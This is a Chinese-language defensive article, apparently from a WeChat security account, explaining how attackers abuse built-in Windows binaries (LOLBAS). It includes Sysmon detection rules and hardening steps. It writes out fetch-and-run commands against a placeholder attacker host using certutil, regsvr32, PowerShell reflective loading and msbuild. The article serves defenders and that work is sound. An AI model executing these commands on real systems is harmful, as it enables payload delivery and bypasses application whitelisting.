Windows系统自带工具竟成黑客武器？防御者必知的LOLBAS攻防手册

一、什么是LOLBAS？

LOLBAS Project 是一个Windows生态攻防圣经，收录了：

✅ 300+微软官方二进制程序（如powershell.exe, certutil.exe）

✅ 系统脚本工具（如cscript.exe, wmic.exe）

✅ 常用库文件（如scrobj.dll, urlmon.dll）

📌 核心价值：揭示攻击者如何利用“白名单程序”绕过安全检测，实现：

恶意代码执行

文件下载/加密

权限提升

防御规避

二、4大高危场景实战演示（附检测命令）

场景1️⃣ 用合法程序下载恶意载荷

:: 用certutil.exe下载木马（伪装证书操作）certutil.exe -urlcache -split -f http://攻击者/恶意.exe C:\Windows\Temp\tmp.exe

场景2️⃣ 无Msiexec时如何安装后门？

:: 用regsvr32加载远程DLL（绕过应用白名单）regsvr32 /s /n /u /i:http://攻击者/shell.scr scrobj.dll

场景3️⃣ 内存执行恶意代码（无文件攻击）

# 用PowerShell反射加载.NET程序集$bytes = (Invoke-WebRequest http://攻击者/恶意.dll).Content$assembly = [System.Reflection.Assembly]::Load($bytes)$assembly.EntryPoint.Invoke($null, $null)

场景4️⃣ 劫持合法进程提权

:: 用msbuild.exe执行C#代码（绕过进程监控）msbuild.exe C:\payload.xml需提前构造包含恶意C#代码的XML项目文件

三、防御者如何应对？企业级加固方案

▶️ 检测技巧（应急响应必查）

# 查找异常证书工具使用（历史记录）

Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | Where-Object { $_.Message -like "*certutil*urlcache*" }

# 监控高风险进程调用（Sysmon配置示例）

<RuleGroup>  <ProcessCreateonmatch="include">    <CommandLinecondition="contains">regsvr32 /i:http</CommandLine>  </ProcessCreate></RuleGroup>

▶️ 加固策略

最小化权限

禁止普通用户执行regsvr32、msbuild等开发工具

限制PowerShell脚本执行策略：

Set-ExecutionPolicy Restricted -Force

网络层过滤

防火墙拦截出站流量中的certutil、bitsadmin进程访问公网

代理服务器禁止.dll、.scr文件下载

深度行为监控

在EDR中配置规则：

告警msbuild加载远程XML

阻止wmic创建可疑进程

ATT&CK映射防御

进程注入T1055驱动级进程保护

四、为什么LOLBAS是企业安全的照妖镜？

攻击面洞察：暴露90%企业忽略的“信任漏洞”

溯源效率：快速关联ATT&CK战术（项目已映射MITRE框架）

防御升级：推动从“黑名单拦截”到“行为分析”的进化

五、拓展资源

官方矩阵：LOLBAS主站 | 攻击技术库

检测工具：

Sigma检测规则：https://github.com/SigmaHQ/sigma

Sysmon魔改配置：https://github.com/SwiftOnSecurity/sysmon-config

靶场实战：Atomic Red Team测试用例（直接关联LOLBAS技术）

原文始发于微信公众号（云梦安全）：Windows系统自带工具竟成黑客武器？防御者必知的LOLBAS攻防手册